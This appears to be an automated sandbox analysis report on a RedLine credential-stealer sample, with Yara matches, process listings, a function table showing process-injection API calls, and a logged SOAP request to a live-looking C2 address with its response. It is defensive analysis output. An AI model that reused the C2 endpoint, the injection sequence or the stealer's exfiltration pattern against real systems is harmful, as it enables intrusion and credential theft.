Jul 27, 2024 06:57:10.872618914 CEST	242	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.58.236:55615 Content-Length: 982542 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jul 27, 2024 06:57:12.421302080 CEST	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Sat, 27 Jul 2024 04:57:11 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	00:56:52
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\UzQWEAhf9B.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UzQWEAhf9B.exe"
Imagebase:	0xa00000
File size:	547'840 bytes
MD5 hash:	357B2371C981675051594D5851DC7CA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.2058036481.0000000003F46000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:56:58
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\UzQWEAhf9B.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\UzQWEAhf9B.exe"
Imagebase:	0x2e0000
File size:	547'840 bytes
MD5 hash:	357B2371C981675051594D5851DC7CA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:56:58
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\UzQWEAhf9B.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\UzQWEAhf9B.exe"
Imagebase:	0x60000
File size:	547'840 bytes
MD5 hash:	357B2371C981675051594D5851DC7CA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	00:56:58
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\UzQWEAhf9B.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UzQWEAhf9B.exe"
Imagebase:	0xb00000
File size:	547'840 bytes
MD5 hash:	357B2371C981675051594D5851DC7CA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000004.00000002.2165587760.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.2168487722.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	00:56:58
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.9%
Total number of Nodes:	348
Total number of Limit Nodes:	26

Executed Functions

Function 053B7020 Relevance: 2.5, Strings: 1, Instructions: 1236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ppcq, xrefs: 053B77E4

Memory Dump Source

Source File: 00000000.00000002.2059616061.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53b0000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: Ppcq
API String ID: 0-3614097696
Opcode ID: 83c3cce3ceb93e46b163681a0c9c5e14c79320f2f54295273d2ea049368f6224
Instruction ID: 275014fca7be08b90367ee3618e20eeaa83d46e074472a2b9d0455a281215c0c
Opcode Fuzzy Hash: 83c3cce3ceb93e46b163681a0c9c5e14c79320f2f54295273d2ea049368f6224
Instruction Fuzzy Hash: 8BC2D674A01619CFDB54DF68C884AE9B7B2FF89300F1195E9E509AB361DB70AE85CF40

Function 053B7010 Relevance: 2.2, Strings: 1, Instructions: 972
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Ppcq, xrefs: 053B77E4

Memory Dump Source

Source File: 00000000.00000002.2059616061.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53b0000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID: Ppcq
API String ID: 0-3614097696
Opcode ID: f7bbb68f00bd7050abdc80473457dafa067e6c34f5fd304480411abbad1d395e
Instruction ID: d97781ec43f8f13e3a517bdd2408612bc656a19c2769ff807e0ba92372f72fdb
Opcode Fuzzy Hash: f7bbb68f00bd7050abdc80473457dafa067e6c34f5fd304480411abbad1d395e
Instruction Fuzzy Hash: E4A2C334A106198FDB65DF64C888AD9B7B2FF89300F1186E9E5096B361DB71AEC5CF40

Function 02D35BF5 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ee91d5ed7f449a48cf8bd5f4a2bf799e1cb7e54eb4e7d90f6bf3fbe0ba90fbf
Instruction ID: 56e38089b5033a1e4c23e29197b15b725c0181c65fb251f95ed29c81bad30919
Opcode Fuzzy Hash: 3ee91d5ed7f449a48cf8bd5f4a2bf799e1cb7e54eb4e7d90f6bf3fbe0ba90fbf
Instruction Fuzzy Hash: 46C09227ECE008D989025884F8000F8E7BCC38F172F80B0A2CACEF33A24210CD348598

Function 02D338DC Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02D33B1E

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d06c8f16b935d4ce10f67503ccbee5a9881439191be6cb3f97de976e155ee7bd
Instruction ID: ccea1b090be8d930aadfa86dee1974481c4b1978b7d914d6d5e25507b1b4ba29
Opcode Fuzzy Hash: d06c8f16b935d4ce10f67503ccbee5a9881439191be6cb3f97de976e155ee7bd
Instruction Fuzzy Hash: 3CA16A71D00219CFDB61DF68C981BEEBBB2BF48314F1485A9E808A7380DB759985CF91

Function 02D338E8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 02D33B1E

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f4b2f6966c28dafc2dc35d5ddaf93359d7278ef3fa67e0980bb2f9c330721552
Instruction ID: 26994351d3b2bd1f3a85be90b1c07e9a79211096521b883cbe5f3653c4e6cef1
Opcode Fuzzy Hash: f4b2f6966c28dafc2dc35d5ddaf93359d7278ef3fa67e0980bb2f9c330721552
Instruction Fuzzy Hash: BA916B71D00219CFDB21DF68C981BEEBBB2BF48314F1485A9D818A7350DB759985CF91

Function 0151B070 Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 0151B2C6

Memory Dump Source

Source File: 00000000.00000002.2057490494.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_UzQWEAhf9B.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 259c712e102e9a25560e1faccd19e744ae3e132a124eb7c9a5c241f84d70f59e
Instruction ID: 291d8b03862b603301bad73a3124eecd2906f32cff9b137e57661ab1f977078a
Opcode Fuzzy Hash: 259c712e102e9a25560e1faccd19e744ae3e132a124eb7c9a5c241f84d70f59e
Instruction Fuzzy Hash: D87168B0A00B068FE726DF2AD54475ABBF1FF88300F108A2DD49ADBA44D775E945CB90

Function 053B1CE5 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053B1E02

Memory Dump Source

Source File: 00000000.00000002.2059616061.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53b0000_UzQWEAhf9B.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: d0478c6b73a9da74de21919f6ab79c9f489b7c72b0895187cb72e87a9c09e3f4
Instruction ID: 7a3ff0639506e6e8ca228f91f8d2890cb322dabb7b5d382550be9bc67aeb7f1c
Opcode Fuzzy Hash: d0478c6b73a9da74de21919f6ab79c9f489b7c72b0895187cb72e87a9c09e3f4
Instruction Fuzzy Hash: 1251E0B1D10309DFDB14CFA9C994ADEBBB6FF48300F24812AE419AB210D7B19845CF90

Function 053B0A90 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 053B1E02

Memory Dump Source

Source File: 00000000.00000002.2059616061.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53b0000_UzQWEAhf9B.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: bcdde088cfae0b469d2f6778418522a9258ca718e92641576f8bbcad1133a91a
Instruction ID: 6062dc85d93c75a4526b3b4edf40689a267ee7bc5bd2e6bf8d9992132ef7681c
Opcode Fuzzy Hash: bcdde088cfae0b469d2f6778418522a9258ca718e92641576f8bbcad1133a91a
Instruction Fuzzy Hash: D851B0B1D10349DFDB14CF99C994ADEBBB6FF48310F24812AE919AB210D7B1A845CF90

Function 053B0BE4 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 053B4381

Memory Dump Source

Source File: 00000000.00000002.2059616061.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_53b0000_UzQWEAhf9B.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 46cbe27ac08049516533306fa42443e21ad9db727fe5da9ffb4a7453c9cec7b5
Instruction ID: cc5c6db56a15d19d87f9a40e446270fb149ad03d677b085e47cce8122c93645f
Opcode Fuzzy Hash: 46cbe27ac08049516533306fa42443e21ad9db727fe5da9ffb4a7453c9cec7b5
Instruction Fuzzy Hash: DB415EB4A10305DFDB14CF99C448AAABBF6FF88314F14C549E51967761D3B4A841CB94

Function 015144B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 015159C9

Memory Dump Source

Source File: 00000000.00000002.2057490494.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_UzQWEAhf9B.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2529222664ef61f1ad55e2521b83b90a741ea70a21473f48839ad2d441cac641
Instruction ID: e5780a772330e75b3ebfa0c6ba0a63b32ec175fe3e470ad716e6231b92cfecce
Opcode Fuzzy Hash: 2529222664ef61f1ad55e2521b83b90a741ea70a21473f48839ad2d441cac641
Instruction Fuzzy Hash: BB41E0B1C10719CBDB25DFA9C884B9DBBF5BF89304F20806AD408AB255DBB16945CF91

Function 0151590D Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 015159C9

Memory Dump Source

Source File: 00000000.00000002.2057490494.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_UzQWEAhf9B.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 563cf4d2b42c2b4bd346d27d4cf4ea6ce60fdaf414a8e59ea729e347eeb9fe53
Instruction ID: abfa001d718f17c3ec3c5c28c437889cc07819e3f00c3071fecb0c84e29b2b6a
Opcode Fuzzy Hash: 563cf4d2b42c2b4bd346d27d4cf4ea6ce60fdaf414a8e59ea729e347eeb9fe53
Instruction Fuzzy Hash: 8841D0B1C10719CBDB25DFA9C884BDDBBF1BF89304F20846AD408AB254DB756946CF51

Function 02D33658 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02D336F0

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8988b0eff2dd5f47bf8fde690584607c34b5a2dda4e2f6d92a7ce3d08b6cbda6
Instruction ID: cfd15ab33879c873dba8a6610ebbb8ad3920b41befc8e72c8be55e94e0dab220
Opcode Fuzzy Hash: 8988b0eff2dd5f47bf8fde690584607c34b5a2dda4e2f6d92a7ce3d08b6cbda6
Instruction Fuzzy Hash: 9C2124B2D003499FCB10DFAAC885BDEBBF5FB48310F108429E919A7340C7789944CBA1

Function 02D33660 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 02D336F0

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: a3758fff759134488273c1bfe5e8e5e437c36089e65cf9104f7f9c9bf058645d
Instruction ID: 2dc6ef20f5f089d8bf229e43d0ff0fd1dbccfb16079d44eae784eba808eaad73
Opcode Fuzzy Hash: a3758fff759134488273c1bfe5e8e5e437c36089e65cf9104f7f9c9bf058645d
Instruction Fuzzy Hash: FC2115B5D003499FCB10DFAAC985BDEBBF5FB48314F108429E919A7340C7789944CBA1

Function 02D33088 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02D3310E

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 1c6d6b46175a7740e4386b130f28a2c3af18fa458ed2f4c9fb5056af51938d21
Instruction ID: edc7f2e5f6ac82d35e1f5b0fe0e280fef3ef9068361c17a3491b06a8865ff812
Opcode Fuzzy Hash: 1c6d6b46175a7740e4386b130f28a2c3af18fa458ed2f4c9fb5056af51938d21
Instruction Fuzzy Hash: B92137B1D003098FDB10DFAAC5857EEBBF4EB88364F14842AD419A7340CB78A945CFA5

Function 02D33748 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 02D337D0

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: dae6e98bd328e16539a8551e945f81b59fbd8d51f3bbb756030c9b820724ae08
Instruction ID: 6f08f492eacc48e82433c5c14e4213c43ccedc9d36e8e818fe1236acd784d3c1
Opcode Fuzzy Hash: dae6e98bd328e16539a8551e945f81b59fbd8d51f3bbb756030c9b820724ae08
Instruction Fuzzy Hash: 9A2116B1D003499FCB10DFAAC885BEEBBF5FF48310F50842AE519A7250D738A945DBA5

Function 0151CE10 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0151D50E,?,?,?,?,?), ref: 0151D5CF

Memory Dump Source

Source File: 00000000.00000002.2057490494.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_UzQWEAhf9B.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e33d975a2381f0dfa884e929692b08c4f9c355f60a923aa7fd125caf0a0c469c
Instruction ID: 27164e73aeda8a53fdafb17c439aa85a8037449cfe119abec41fe287a4853353
Opcode Fuzzy Hash: e33d975a2381f0dfa884e929692b08c4f9c355f60a923aa7fd125caf0a0c469c
Instruction Fuzzy Hash: 2C21D2B5D002499FDB10CF9AD884AEEBFF8FB48314F14841AE918A7350D374A954CFA1

Function 0151D540 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0151D50E,?,?,?,?,?), ref: 0151D5CF

Memory Dump Source

Source File: 00000000.00000002.2057490494.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_UzQWEAhf9B.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6e153b2ec4c19642ce922cbb8e47ef13e8fbeedcf50f743d30ef3fb830aa70c9
Instruction ID: 112f426547bbf38a5752270986b99841fe45fe12520158baf685daa75dcb8b9a
Opcode Fuzzy Hash: 6e153b2ec4c19642ce922cbb8e47ef13e8fbeedcf50f743d30ef3fb830aa70c9
Instruction Fuzzy Hash: 9A21E3B5D00249AFDB10CFAAD885ADEBFF8FB48310F14841AE918A7310D374A944CFA5

Function 02D33090 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02D3310E

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3b5a88cb83fde2d3b9dca298e3d6df92a945ec12e7a857abc3ebd1ff56c9a3ce
Instruction ID: 4c3aa405333db52d80f2646e0a4a60f1857ef2d8b81abc3754a6604832de5793
Opcode Fuzzy Hash: 3b5a88cb83fde2d3b9dca298e3d6df92a945ec12e7a857abc3ebd1ff56c9a3ce
Instruction Fuzzy Hash: E62104B1D002098FDB10DFAAC5857EEBBF4EB88364F14842AD419A7240CB78A945CBA1

Function 02D33750 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 02D337D0

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5fd51510e14698c8602640cd823e92a8a4b733c2cb32d79c47fb30378cdb0f04
Instruction ID: 639756b944099e39f6650f86b1bc693f4c603308f4c2411bbb97dfccceb6a97a
Opcode Fuzzy Hash: 5fd51510e14698c8602640cd823e92a8a4b733c2cb32d79c47fb30378cdb0f04
Instruction Fuzzy Hash: 932137B1D003499FCB10DFAAC885AEEFBF5FF88310F10842AE519A7240C7389945DBA1

Function 02D33599 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02D3360E

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f21005bfcd2df3d8ef37f4c350241fce4dc0683699291a6988c6eb0bc2f07eb5
Instruction ID: eeac1b6685e767e309f2d64881ac27916dc1f362521fd49f270a8dcc398d110c
Opcode Fuzzy Hash: f21005bfcd2df3d8ef37f4c350241fce4dc0683699291a6988c6eb0bc2f07eb5
Instruction Fuzzy Hash: CF112972D002499FCB10DFAAC845BDFBFF5EB88324F248419E519A7250C7759944DBA1

Function 0151AA88 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0151B341,00000800,00000000,00000000), ref: 0151B552

Memory Dump Source

Source File: 00000000.00000002.2057490494.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_UzQWEAhf9B.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1944b9904d591592ab3234935168835b251ada520a6206727a27b96f58c8defc
Instruction ID: 335bbaa14d0697353370f78ddbf8e0199b6a802a7c4f5c50a6dc7e9ead0297ec
Opcode Fuzzy Hash: 1944b9904d591592ab3234935168835b251ada520a6206727a27b96f58c8defc
Instruction Fuzzy Hash: F31114B6D003499FDB10DF9AD444A9EFBF4FB48310F11842AE519AB210D375A545CFA5

Function 02D32FD8 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNEL32 ref: 02D33042

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: aa53a8d124ec2ebe9d7698f39a366abd2b1abe808ddc9db2b82814908d646925
Instruction ID: bfdbbb0a28787e336334a925933570aed3d722700f509b193fab53c767660469
Opcode Fuzzy Hash: aa53a8d124ec2ebe9d7698f39a366abd2b1abe808ddc9db2b82814908d646925
Instruction Fuzzy Hash: C61104B1D002498BDB20DFAAC84979FFBF9EB88324F248419D519A7240CB75A945CBA5

Function 02D335A0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 02D3360E

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1e141796205c31d04ec53c53873ed08fe2dc07a17652284421b5dadbc73d9928
Instruction ID: 948d56790c32db9728818812e45e369a8a978ecd452e4bd4b9b29351bced2f16
Opcode Fuzzy Hash: 1e141796205c31d04ec53c53873ed08fe2dc07a17652284421b5dadbc73d9928
Instruction Fuzzy Hash: 53112372D002499FCB10DFAAC845ADFBFF5EB88324F208819E519A7250CB75A944CBA1

Function 0151B4E1 Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0151B341,00000800,00000000,00000000), ref: 0151B552

Memory Dump Source

Source File: 00000000.00000002.2057490494.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1510000_UzQWEAhf9B.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ca3af76c961986a03cc1c781d6b5bc251f32e9a722e4e85144ef0f914ec7830d
Instruction ID: 61a68da842ef8402e929ffe7b5ffebbba8b8c6f4a314fae47f694e69448cffe3
Opcode Fuzzy Hash: ca3af76c961986a03cc1c781d6b5bc251f32e9a722e4e85144ef0f914ec7830d
Instruction Fuzzy Hash: C71112B6D003498FEB10CFAAD444ADEFBF4FB48310F15842AD519A7210C374A545CFA1

Function 02D36B78 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,?,?,?,?,?,02D37361,?,?), ref: 02D37508

Memory Dump Source

Source File: 00000000.00000002.2057571525.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d30000_UzQWEAhf9B.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 592b840e12714d76e3ae4e3f4e93062e3b214d90af5abea73dc310bec74b7375
Instruction ID: f6ba9bd8ff2fdc43458fca121e254366ac5fd92424598a43bae8b1d61a9fa3dd
Opcode Fuzzy Hash: 592b840e12714d76e3ae4e3f4e93062e3b214d90af5abea73dc310bec74b7375
Instruction Fuzzy Hash: 351113B5C006498FDB10DF99C585BAEBBF4EB48320F108459E958A7341D378A944CFA5

